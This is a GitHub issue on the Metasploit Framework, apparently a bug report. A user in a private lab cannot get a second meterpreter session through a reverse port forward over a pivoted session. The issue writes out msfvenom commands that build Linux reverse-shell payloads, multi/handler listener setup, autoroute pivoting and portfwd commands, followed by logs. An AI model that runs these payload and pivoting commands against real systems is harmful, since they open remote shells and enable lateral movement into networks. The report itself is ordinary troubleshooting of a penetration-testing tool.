rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.74k stars 13.89k forks source link

Reverse Port Forwarding to get meterpreter through pivoting meterpreter sessions #15089

Open Hyatche opened 3 years ago

Hyatche commented 3 years ago

Steps to reproduce

Hi I have the folowing lab :

  1. Parrot security Linux with metasploit msfconsole (Framework: 6.0.38-dev Console : 6.0.38-dev) : IP -> 10.0.0.4
  2. Ubuntu 20.04 with 2 interfaces : IP 1 -> 10.0.0.5 and IP 2 -> 10.5.0.4
  3. Debian 10 : IP -> 10.5.0.3

The Parrot VM can not join Debian and vice versa.

On the Parrot I start msfconsole (version 6.0.38-dev) and execute folowing command :

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 10.0.0.4
set LPORT 4343
exploit -j
set payload linux/x86/meterpreter/reverse_tcp
set LPORT 6666
exploit -j
# When first session (linux) meterpreter is open
use post/multi/manage/autoroute
set SESSION 1
exploit

sessions -i 1
# Reverse forward port 6666 of Ubuntu to port 6666 of parrot
portfwd add -R -L 10.0.0.4 -l 6666 -p 6666
bg

The Ubuntu payload is generate with msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.4 LPORT=4343 -f elf -o paylaod.

Payload on Debian generate with msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.5.0.4 LPORT=6666 -f elf -o paylaod_debian.

On the Ubuntu after portfwd command execution netstat -tlupn | grep 6666 see port 6666 on Listening (open by the payload).

Expected behavior

Reverse tcp sessions meterpreter on the Debian.

Current behavior

Nothing on the parrot. Segement fault or Illegal Instruction for the Debian payload.

Metasploit version

6.0.38-dev.

Additional Information

If I replace the portfwd of meterpreter by the ssh -R Debian payload works.

Metapsloit log

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse ``` [framework/core] loglevel=3 [framework/ui/console] ActiveModule=post/multi/manage/autoroute [multi/manage/autoroute] WORKSPACE= VERBOSE=false SESSION=1 SUBNET= NETMASK=255.255.255.0 CMD=autoadd ```

History

The following commands were ran during the session and before this issue occurred:

Collapse ``` 340 version 341 set loglevel 3 342 use exploit/multi/handler 343 set payload linux/x86/meterpreter/reverse_tcp 344 set LHOST 10.0.0.4 345 set LPORT 4343 346 exploit -j 347 set LPORT 6666 348 exploit -j 349 use post/multi/manage/autoroute 350 set SESSION 1 351 exploit 352 sessions -i 1 353 portfwd -R -L 10.0.0.4 -l 6666 -p 6666 354 portfwd add -R -L 10.0.0.4 -l 6666 -p 6666 355 portfwd 356 bg 357 debug ```

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse ``` [04/23/2021 13:13:49] [e(0)] core: Failed to connect to the database: No database YAML file [04/23/2021 14:02:44] [e(0)] core: Failed to connect to the database: No database YAML file [04/23/2021 14:05:56] [e(0)] core: Failed to connect to the database: No database YAML file ```

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse ``` msf-ws.log does not exist. ```

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse ``` [04/23/2021 13:12:15] [e(0)] core: Failed to connect to the database: No database YAML file [04/23/2021 14:27:31] [i(2)] core: Reloading exploit module multi/handler. Ambiguous module warnings are safe to ignore [04/23/2021 14:27:37] [d(3)] core: Checking compat [linux/x86/meterpreter/reverse_tcp with multi/handler]: reverse to reverse [04/23/2021 14:27:37] [d(3)] core: Checking compat [linux/x86/meterpreter/reverse_tcp with multi/handler]: bind to reverse [04/23/2021 14:27:37] [d(3)] core: Checking compat [linux/x86/meterpreter/reverse_tcp with multi/handler]: noconn to reverse [04/23/2021 14:27:37] [d(3)] core: Checking compat [linux/x86/meterpreter/reverse_tcp with multi/handler]: none to reverse [04/23/2021 14:27:37] [d(3)] core: Checking compat [linux/x86/meterpreter/reverse_tcp with multi/handler]: tunnel to reverse [04/23/2021 14:27:37] [d(1)] core: Module linux/x86/meterpreter/reverse_tcp is compatible with multi/handler [04/23/2021 14:29:45] [w(0)] core: /usr/share/metasploit-framework/modules/encoders/x86/bf_xor.rb generated a warning during load: Please change the module's class name from Metasploit3 to MetasploitModule [04/23/2021 14:29:45] [w(0)] core: /usr/share/metasploit-framework/modules/encoders/x64/bf_xor.rb generated a warning during load: Please change the module's class name from Metasploit3 to MetasploitModule [04/23/2021 14:29:58] [w(0)] core: /usr/share/metasploit-framework/modules/encoders/x86/bf_xor.rb generated a warning during load: Please change the module's class name from Metasploit3 to MetasploitModule [04/23/2021 14:29:58] [w(0)] core: /usr/share/metasploit-framework/modules/encoders/x64/bf_xor.rb generated a warning during load: Please change the module's class name from Metasploit3 to MetasploitModule [04/23/2021 14:30:29] [w(0)] core: /usr/share/metasploit-framework/modules/encoders/x86/bf_xor.rb generated a warning during load: Please change the module's class name from Metasploit3 to MetasploitModule [04/23/2021 14:30:29] [w(0)] core: /usr/share/metasploit-framework/modules/encoders/x64/bf_xor.rb generated a warning during load: Please change the module's class name from Metasploit3 to MetasploitModule [04/23/2021 14:32:18] [i(2)] core: Reloading post module multi/manage/autoroute. Ambiguous module warnings are safe to ignore ```

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse ``` msf-ws.log does not exist. ```

Version/Install

The versions and install method of your Metasploit setup:

Collapse ``` Framework: 6.0.38-dev Ruby: ruby 2.7.2p137 (2020-10-01 revision 5445e04352) [x86_64-linux-gnu] Install Root: /usr/share/metasploit-framework Session Type: postgresql selected, no connection Install Method: Other - Please specify ```
github-actions[bot] commented 3 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.